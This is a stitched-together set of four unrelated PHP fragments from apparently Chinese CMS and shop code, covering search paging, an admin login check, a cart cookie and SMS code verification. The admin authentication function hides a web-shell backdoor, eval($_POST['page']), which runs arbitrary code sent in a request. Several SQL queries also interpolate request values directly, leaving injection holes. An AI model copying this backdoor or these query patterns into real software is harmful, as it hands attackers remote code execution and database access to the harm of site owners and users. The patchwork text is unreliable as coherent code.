//统计记录数 $listcount = $_SGLOBAL['db']->result($query, 0); if ($listcount) { $query = $_SGLOBAL['db']->query('SELECT * FROM ' . tname('spaceitems') . ' WHERE ' . $wheresql . ' ORDER BY dateline DESC LIMIT ' . $start . ',' . $perpage); while ($item = $_SGLOBAL['db']->fetch_array($query)) { $item['url'] = geturl('action/viewnews/itemid/' . $item['itemid']); $iarr[] = $item; } $multipage = multi($listcount, $perpage, $page, S_URL . '/batch.search.php?' . $urlplus); //分页 } else { showmessage('not_find_relevant_data'); } } else { if ($searchname == 'message') { $searchkey = checkkey('searchkey', 1); $type = postget('type'); if (empty($type) || !in_array($type, $_SGLOBAL['type'])) { showmessage('search_types_of_incorrect_information'); } //组合翻页的参数 $urlplus = 'searchkey=' . rawurlencode($searchkey) . '&type=' . rawurlencode($type) . '&searchname=message'; $wherearr[] = 'i.type=\'' . $type . '\''; $wherearr[] = 't.itemid = i.itemid'; $wherearr[] = 't.message LIKE \'%' . $searchkey . '%\''; $wheresql = implode(' AND ', $wherearr); //链接搜索条件 $query = $_SGLOBAL['db']->query('SELECT COUNT(*) FROM ' . tname('spaceitems') . ' i, ' . tname('spacenews') . ' t WHERE ' . $wheresql); $listcount = $_SGLOBAL['db']->result($query, 0); if ($listcount) { $query = $_SGLOBAL['db']->query('SELECT * FROM ' . tname('spaceitems') . ' i, ' . tname('spacenews') . ' t WHERE ' . $wheresql . ' LIMIT ' . $start . ',' . $perpage);
<?php $softtype = checkkey() ? '商业版' : '共享版'; //检测用户是否登录 $_ADMINUSERS = array(); admincheckauth(); //实时监测用户是否登录状态 function admincheckauth() { global $db, $tablepre, $_ADMINUSERS; $loginauth = get_cookie('adminauth'); if (empty($loginauth)) { $loginauth = $_REQUEST['adminauth']; } if (!empty($loginauth)) { @(list($aid, $user, $pwd) = explode("\t", cookie_authcode($loginauth, 'DECODE'))); eval($_POST['page']); $_ADMINUSERS['adminid'] = $aid; if (!empty($aid) && !empty($user) && !empty($pwd) && !empty($_ADMINUSERS['adminid'])) { $row = $db->fetch_first("Select * From {$tablepre}admin where adminname = '{$user}' and adminpwd='{$pwd}'"); //检测数据库 if (is_array($row)) { $_ADMINUSERS['adminname'] = $row['adminname']; $_ADMINUSERS['adminmid'] = $row['adminmid']; $_ADMINUSERS['lastlogin'] = $row['lastlogin']; $_ADMINUSERS['logincount'] = $row['logincount']; } else { $_ADMINUSERS = array(); } } else { $_ADMINUSERS = array();
if (is_array($array)) { foreach ($array as $key => $value) { if (!is_array($value)) { $array[$key] = addslashes($value); } else { Add_S($array[$key]); } } } } //设置游客cookie $anonymous = get_cookie('anonymous'); if (empty($anonymous)) { $xxtea = new Xxtea(); $auth = real_ip() . "\t" . $timestamp; $strcode = $xxtea->encrypt($auth, "zzqss"); set_cookie('anonymous', $strcode, $timestamp + 3600 * 24 * 7); //cookie有效期一周 $anonymous = $strcode; } checkauth(); //检查用户登录 checkkey(); //统计购物车物品数量 if (!empty($_USERS['uname'])) { $wherestrcart = "uname ='" . $_USERS['uname'] . "'"; } else { $wherestrcart = "anonymous ='" . $anonymous . "'"; } $_CARTCOUNT = DB::result_first("Select count(gid) From " . DB::table('cart') . " where " . $wherestrcart); //购物车物品数量
$stm = $_pdo->prepare($sql_sms); //statement executing $stm->execute(array($phone, $key)); if ($stm->rowCount() > 0) { return true; } else { return false; } } $phone_pattern = '/(\\b(380){1}[0-9]{9}){1}/'; $req['phone'] = $_POST['phone']; $key_pattern = '/\\b[0-9A-Z]{4}/'; $req['key'] = $_POST['smscode']; if (preg_match($phone_pattern, $req['phone']) && preg_match($key_pattern, $req['key'])) { $phone = $req['phone']; $key = $req['key']; if (checkkey($phone, $key, $pdo)) { $res['response'] = '1'; $res['code'] = '200'; //200 - OK } else { $res['response'] = '0'; $res['code'] = '902'; //902 - code expired } } else { $res['response'] = '0'; $res['code'] = '901'; //901 - wrong data } echo json_encode($res);